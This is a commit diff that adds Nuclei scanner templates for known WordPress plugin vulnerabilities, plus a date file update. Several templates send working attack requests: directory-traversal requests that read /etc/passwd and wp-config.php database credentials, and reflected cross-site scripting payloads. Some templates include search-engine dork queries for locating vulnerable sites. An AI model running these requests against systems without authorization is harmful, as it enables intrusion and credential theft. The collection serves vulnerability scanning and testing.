20241126

date.txt

@@ -1 +1 @@
-20241125
+20241126

poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml

@@ -0,0 +1,59 @@
+id: cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9
+
+info:
+  name: >
+    Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/cm-video-lesson-manager/"
+    google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "cm-video-lesson-manager"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.8.2')

poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml

@@ -0,0 +1,59 @@
+id: boldgrid-backup-889122f13f92f4a43160426c13aa8df0
+
+info:
+  name: >
+    Total Upkeep <= 1.16.6 - Authenticated (Administrator+) Remote Code Execution via Backup Settings
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/boldgrid-backup/"
+    google-query: inurl:"/wp-content/plugins/boldgrid-backup/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,boldgrid-backup,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "boldgrid-backup"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.16.6')

poc/cve/CVE-2011-1669-2046.yaml

@@ -0,0 +1,31 @@
+id: CVE-2011-1669
+info:
+  name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
+  author: daffainfo
+  severity: high
+  description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
+    - https://www.exploit-db.com/exploits/17119
+    - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/
+    - http://www.exploit-db.com/exploits/17119
+  remediation: Upgrade to a supported version.
+  classification:
+    cve-id: CVE-2011-1669
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
+  tags: cve,cve2011,wordpress,wp-plugin,lfi
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/18

poc/cve/CVE-2011-4624-2075.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-4624
+
+info:
+  name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+  tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2013-3526-2254.yaml

@@ -0,0 +1,30 @@
+id: CVE-2013-3526
+
+info:
+  name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+  tags: cve,cve2013,wordpress,xss,wp-plugin
+  description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2013-4625-2269.yaml

@@ -0,0 +1,30 @@
+id: CVE-2013-4625
+
+info:
+  name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
+
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2014-4535-2349.yaml

@@ -0,0 +1,32 @@
+id: CVE-2014-4535
+info:
+  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2014-4535
+    cwe-id: CWE-79
+  description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'></script><script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2014-4592-2380.yaml

@@ -0,0 +1,37 @@
+id: CVE-2014-4592
+info:
+  name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
+  reference:
+    - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4592
+    - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2014-4592
+    cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-planet"
+  tags: cve,cve2014,wordpress,wp-plugin,xss
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/24

poc/cve/CVE-2014-5368-2398.yaml

@@ -0,0 +1,30 @@
+id: CVE-2014-5368
+info:
+  name: WordPress Plugin WP Content Source Control - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
+    - https://www.exploit-db.com/exploits/39287
+    - https://www.cvedetails.com/cve/CVE-2014-5368
+  tags: cve,cve2014,wordpress,wp-plugin,lfi
+  classification:
+    cve-id: CVE-2014-5368
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/25

poc/cve/CVE-2014-9094-2416.yaml

@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+  name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+  tags: cve,2014,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200